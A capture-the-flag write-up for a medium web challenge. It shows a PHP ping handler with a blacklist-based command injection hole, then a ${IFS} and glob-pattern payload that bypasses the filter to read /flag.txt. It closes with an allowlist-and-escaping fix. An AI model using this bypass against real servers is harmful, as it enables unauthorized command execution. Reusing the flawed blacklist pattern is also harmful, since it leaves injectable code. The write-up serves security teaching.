DeadSec CTF 2024 | Bing2 (Web, Command Injection)
Difficulty : Medium

Let's start by reading the code.
<?php
if (isset($_POST['Submit'])) {
    $target = trim($_REQUEST['ip']);
    $substitutions = array(
        ' '         => '',
        '&'         => '',
        '&&'        => '',
        '('         => '',
        ')'         => '',
        '-'         => '',
        '`'         => '',
        '|'         => '',
        '||'        => '',
        '; '        => '',
        '%'         => '',
        '~'         => '',
        '<'         => '',
        '>'         => '',
        '/ '        => '',
        '\\'        => '',
        'ls'        => '',
        'cat'       => '',
        'less'      => '',
        'tail'      => '',
        'more'      => '',
        'whoami'    => '',
        'pwd'       => '',
        'busybox'   => '',
        'nc'        => '',
        'exec'      => '',
        'sh'        => '',
        'bash'      => '',
        'php'       => '',
        'perl'      => '',
        'python'    => '',
        'ruby'      => '',
        'java'      => '',
        'javac'     => '',
        'gcc'       => '',
        'g++'       => '',
        'make'      => '',
        'cmake'     => '',
        'nmap'      => '',
        'wget'      => '',
        'curl'      => '',
        'scp'       => '',
        'ssh'       => '',
        'ftp'       => '',
        'telnet'    => '',
        'dig'       => '',
        'nslookup'  => '',
        'iptables'  => '',
        'chmod'     => '',
        'chown'     => '',
        'chgrp'     => '',
        'kill'      => '',
        'killall'   => '',
        'service'   => '',
        'systemctl' => '',
        'sudo'      => '',
        'su'        => '',
        'flag'      => '',
    );
    $target = str_replace(array_keys($substitutions), $substitutions, $target);
    if (stristr(php_uname('s'), 'Windows NT')) {
        $cmd = shell_exec('ping ' . $target);
    } else {
        $cmd = shell_exec('ping -c 4 ' . (string)$target);
        echo $cmd;
    }
}
So we need two POST parameters: Submit and ip. The ip parameter is where our command injection goes, because it is concatenated into the shell command after a single pass of str_replace.
For Submit you can simply add the parameter to the request. If the server only accepts it when it comes from a form, you can create a form on the main page:
<form method="post" action="bing.php">
    <input type="Submit" name="Submit" value="Submit" class="btn btn-success">
</form>
This is the payload we want to run, but it needs to be modified to get past the filters:
localhost; /bin/cat /flag.txt;
For spaces we can use ${IFS}, and to get around the blacklisted words cat and flag we can use the glob patterns ca[t] and fla[g], which the shell expands back to the original names:
localhost;${IFS}/bin/ca[t]${IFS}/fla[g].txt;
This runs but displays nothing. The reason is shell_exec, which returns null when an error occurs or the command does not finish successfully, so we need to force a successful exit status after each command.
Our final payload looks like this:
localhost${IFS};${IFS}echo${IFS}$?;${IFS}/bin/ca[t]${IFS}/fla[g].txt${IFS}true;${IFS}echo${IFS}$?;
Finally, we send it with Burp Suite and get the flag.
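The challenge fails because it tries to blacklist shell syntax and command names with a single-pass str_replace, while the only thing the handler actually needs is a hostname or IP address. The following is an added example, not the challenge's code, showing the defensive counterpart: an allowlist check on the target plus escapeshellarg, so nothing but a well-formed host ever reaches the shell. The helper names validate_ping_target and build_ping_command are hypothetical; the sample inputs are constructed for this example and the command is only built, not executed.

```php
<?php
// Added example (not the challenge's code). Hypothetical helpers that replace
// the str_replace blacklist with an allowlist check and shell escaping.

/**
 * Return the validated target or null.
 * Accepts IPv4/IPv6 literals and conservative hostnames: dot-separated
 * labels of letters, digits and hyphens, where no label starts or ends
 * with a hyphen (so the value can never be parsed by ping as an option).
 */
function validate_ping_target(string $raw): ?string
{
    $target = trim($raw);
    if ($target === '' || strlen($target) > 253) {
        return null;
    }
    if (filter_var($target, FILTER_VALIDATE_IP) !== false) {
        return $target;
    }
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    if (preg_match('/^' . $label . '(?:\.' . $label . ')*$/', $target) === 1) {
        return $target;
    }
    return null;
}

/** Build the ping command, or return null when the target is rejected. */
function build_ping_command(string $raw): ?string
{
    $target = validate_ping_target($raw);
    if ($target === null) {
        return null;
    }
    // escapeshellarg single-quotes the value, so even an unexpected
    // character would reach ping as data, never as shell syntax.
    return 'ping -c 4 ' . escapeshellarg($target);
}

// Constructed inputs for a stand-alone run.
$samples = [
    '127.0.0.1',          // accepted
    '::1',                // accepted
    'localhost',          // accepted
    'example.com',        // accepted
    '-c 100 127.0.0.1',   // leading hyphen and space: rejected
    'localhost;',         // shell metacharacter: rejected
    'localhost${IFS}',    // the ${IFS} space substitution: rejected
];
foreach ($samples as $s) {
    $cmd = build_ping_command($s);
    printf("%-24s => %s\n", var_export($s, true), $cmd ?? 'rejected');
}
```

In the request handler, a null from build_ping_command should produce an HTTP 400 rather than a fallback to the raw value. Keeping the allowlist this narrow also makes the blacklist irrelevant: the glob, ${IFS} and keyword-splitting tricks in the writeup all depend on characters the validator never lets through.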
